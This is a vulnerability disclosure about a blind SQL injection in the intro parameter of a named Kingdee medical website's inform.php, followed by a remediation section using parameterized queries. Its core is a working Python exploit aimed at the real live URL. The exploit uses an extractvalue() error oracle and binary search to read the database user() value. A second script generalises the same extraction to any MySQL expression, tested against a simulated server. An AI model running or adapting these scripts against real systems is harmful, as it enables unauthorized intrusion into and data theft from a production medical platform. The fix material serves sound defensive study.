SQL injection vulnerability in a Kingdee system (with verification script)
Kingdee system Injection Vulnerability
Kingdee Medical launched the first "mobile Internet hospital" in China on May 30, 2014, and was covered in two special reports on CCTV, including the evening news broadcast. The vendor describes the product as having the most advanced implementation method, the safest deployment model, the most extensive experience in whole-process optimisation, the most professional media and operational promotion, and the best user experience. As of November 8, 2015, the mobile Internet hospital platform had more than 1.3 million users and more than 2.62 million transactions, and the vendor positions it as the undisputed leader among mobile Internet hospitals.
http://yiliao.kingdee.com/inform.php?action=add&companyname=e&intro=1&email=[email protected]&name=1&position=1&tel=1
The intro parameter is vulnerable to blind (boolean-based) SQL injection: the submitted value is placed into the SQL statement unescaped, and the page reveals one bit per request, namely whether an injected condition held. The verification script below turns that bit into an error oracle with extractvalue(): when the injected condition is false, extractvalue() is handed an invalid XPath expression (0x22, a lone double quote) and MySQL raises an error that surfaces on the page; when it is true, the page renders normally. Reading the result of user() one character at a time by binary search is enough to prove the injection.
# coding=utf-8
# Verification script for the injection in the intro parameter (ported from the
# original Python 2 script to Python 3; the request logic and payload are unchanged).
import sys
from urllib.error import HTTPError, URLError
from urllib.parse import quote
from urllib.request import Request, urlopen

TARGET = ('http://yiliao.kingdee.com/inform.php?action=add&companyname=e'
          '&email=[email protected]&name=1&position=1&tel=1&intro=')
USER_AGENT = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 '
              '(KHTML, like Gecko) Version/5.1.3 Safari/534.53.10')

result = ''


def request(url, data=None):
    """Fetch url and return the response body as text.

    An HTTP 500 is part of the oracle (the XPath error is raised server side),
    so it is reported as 'Runtime Error' instead of being treated as a failure.
    """
    req = Request(url, data, {'User-Agent': USER_AGENT})
    try:
        resp = urlopen(req)
    except HTTPError as e:
        if e.code == 500:
            return 'Runtime Error'
        return e.read().decode('utf-8', 'replace')
    except URLError as e:
        print('[!] We failed to reach a server: %s' % e.reason)
        sys.exit(1)
    return resp.read().decode('utf-8', 'replace')


def binary_sqli(left, right, index):
    """Recover character number index of user() by binary search.

    Oracle: when ascii(char) is NOT between 0 and mid, extractvalue() is given
    the valid XPath '1' and the page renders normally; otherwise it is given
    0x22 (a lone double quote), MySQL raises 'XPATH syntax error' and the page
    contains 'Error'. Loop invariant: left < ascii(char) <= right.
    """
    global result
    while True:
        mid = (left + right) // 2
        if right - left == 1:
            result += chr(right)
            print('user:', result)
            break
        payload = ("1'+extractvalue(1,if(ascii(mid(user(),%d,1)) "
                   "not between 0 and %d,1,0x22))+'" % (index, mid))
        # quote() URL-encodes the '+' and the quotes so they reach the server intact
        html = request(TARGET + quote(payload, safe=''))
        if 'Error' not in html:
            left = mid    # character is above mid
        else:
            right = mid   # character is at or below mid


if __name__ == '__main__':
    # Read 26 characters of user(); positions past the end of the string come
    # back as '!' because ascii('') is 0, which is always within range.
    for i in range(1, 27):
        binary_sqli(32, 127, i)
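To make the oracle's mechanics checkable offline, here is an added example (my code, not the original verification script): the same payload construction, a simulated server that answers only the "not between 0 and mid" question, and a binary search that generalises the script to any MySQL expression and stops at the end of the string instead of reading a fixed 26 positions. The FAKE_DB values, the function names and the regular expression that stands in for the server are constructed for the demonstration.

```python
import re

# Constructed stand-in for the database: what each probed expression evaluates to.
FAKE_DB = {"user()": "kingdee@localhost", "version()": "5.5.40-log"}


def build_payload(expr, pos, mid):
    """The page's probe for one character, generalised to any expression.

    The form's legitimate value is 1; the leading quote closes that literal and
    the trailing +' reopens it, so the statement stays well formed. MySQL raises
    'XPATH syntax error' only when extractvalue() receives 0x22 (a lone double
    quote), i.e. only when ascii(mid(expr,pos,1)) <= mid.
    """
    return ("1'+extractvalue(1,if(ascii(mid(%s,%d,1)) not between 0 and %d,1,0x22))+'"
            % (expr, pos, mid))


PROBE_RE = re.compile(r"ascii\(mid\((.+?),(\d+),1\)\) not between 0 and (\d+)")


def simulated_oracle(payload):
    """Stand-in for the live site: True when the response would show the XPATH error.

    Only the 'not between 0 and mid' test is evaluated against FAKE_DB; that is
    exactly the one bit of information the real page leaks per request.
    """
    m = PROBE_RE.search(payload)
    expr, pos, mid = m.group(1), int(m.group(2)), int(m.group(3))
    value = FAKE_DB[expr]
    code = ord(value[pos - 1]) if pos <= len(value) else 0  # MySQL: ascii('') is 0
    cond = not (0 <= code <= mid)  # the injected 'not between' condition
    return not cond  # condition false -> if() yields 0x22 -> error page


def extract(expr, errors, max_len=64):
    """Recover expr one character at a time through the error oracle.

    errors(payload) must return True when the response shows the error.
    Search space is [0, 127] with the invariant left < code <= right, so each
    loop ends with right == code. A recovered 0 means the position is past the
    end of the string, so extraction stops there.
    """
    out = ""
    for pos in range(1, max_len + 1):
        left, right = -1, 127
        while right - left > 1:
            mid = (left + right) // 2
            if errors(build_payload(expr, pos, mid)):
                right = mid   # code <= mid
            else:
                left = mid    # code > mid
        if right == 0:
            break
        out += chr(right)
    return out


if __name__ == "__main__":
    for expr in FAKE_DB:
        print("%s -> %r" % (expr, extract(expr, simulated_oracle)))
```

Against the live site, errors would be a function that sends the payload as the intro parameter and returns whether "Error" appears in the response; each character costs about seven requests, so user() comes back in a few hundred requests.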
Solution:
Use parameterized queries (prepared statements with bound parameters) for intro and the other form fields instead of concatenating user input into the SQL statement; filtering or escaping input on its own is a weaker, bypass-prone control. Also stop echoing database errors to the page, since the verification script above relies on the error message as its oracle.
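The page's inform.php is PHP and its source is not shown, so the following is an added Python/sqlite3 example, not Kingdee's code, that reproduces the defect class and its fix side by side: a statement assembled by string formatting evaluates an injected expression, while the same insert with bound parameters stores the payload as plain text. The table layout, the form values and the payload (SQLite's || in place of MySQL's +, since SQLite has no extractvalue()) are constructed for the demonstration.

```python
import sqlite3

SCHEMA = ("CREATE TABLE inform (companyname TEXT, intro TEXT, email TEXT, "
          "name TEXT, position TEXT, tel TEXT)")

# Constructed analogue of the page's intro payload: close the literal, evaluate
# an expression, reopen the literal so the statement stays well formed.
PAYLOAD = "1'||sqlite_version()||'"

# Constructed form submission mirroring the page's query string.
FORM = {"companyname": "e", "intro": PAYLOAD, "email": "user@example.com",
        "name": "1", "position": "1", "tel": "1"}


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db


def db_version():
    """What the injected sqlite_version() call evaluates to on this machine."""
    return sqlite3.connect(":memory:").execute("SELECT sqlite_version()").fetchone()[0]


def insert_vulnerable(db, fields):
    """Hypothetical stand-in for the bug: SQL assembled by string formatting.

    Whatever is in intro becomes part of the statement text, so a value that
    closes the quote is parsed and executed as SQL.
    """
    sql = ("INSERT INTO inform (companyname,intro,email,name,position,tel) VALUES "
           "('%(companyname)s','%(intro)s','%(email)s','%(name)s','%(position)s','%(tel)s')"
           % fields)
    db.execute(sql)
    return sql


def insert_safe(db, fields):
    """The fix: placeholders in the statement, values bound by the driver.

    The statement text is constant; intro travels separately as data and is
    never parsed as SQL, whatever characters it contains.
    """
    sql = ("INSERT INTO inform (companyname,intro,email,name,position,tel) VALUES "
           "(:companyname,:intro,:email,:name,:position,:tel)")
    db.execute(sql, fields)
    return sql


def stored_intro(insert, fields=FORM):
    """Run one insert strategy on a fresh database and return what landed in intro."""
    db = fresh_db()
    insert(db, fields)
    return db.execute("SELECT intro FROM inform").fetchone()[0]


if __name__ == "__main__":
    print("vulnerable:", stored_intro(insert_vulnerable))  # '1' + library version: expression ran
    print("safe:      ", stored_intro(insert_safe))        # the payload itself, stored as text
```

The same distinction holds for PHP: building the statement with string interpolation reproduces the vulnerable path, while PDO or mysqli prepared statements with bound parameters reproduce the safe one.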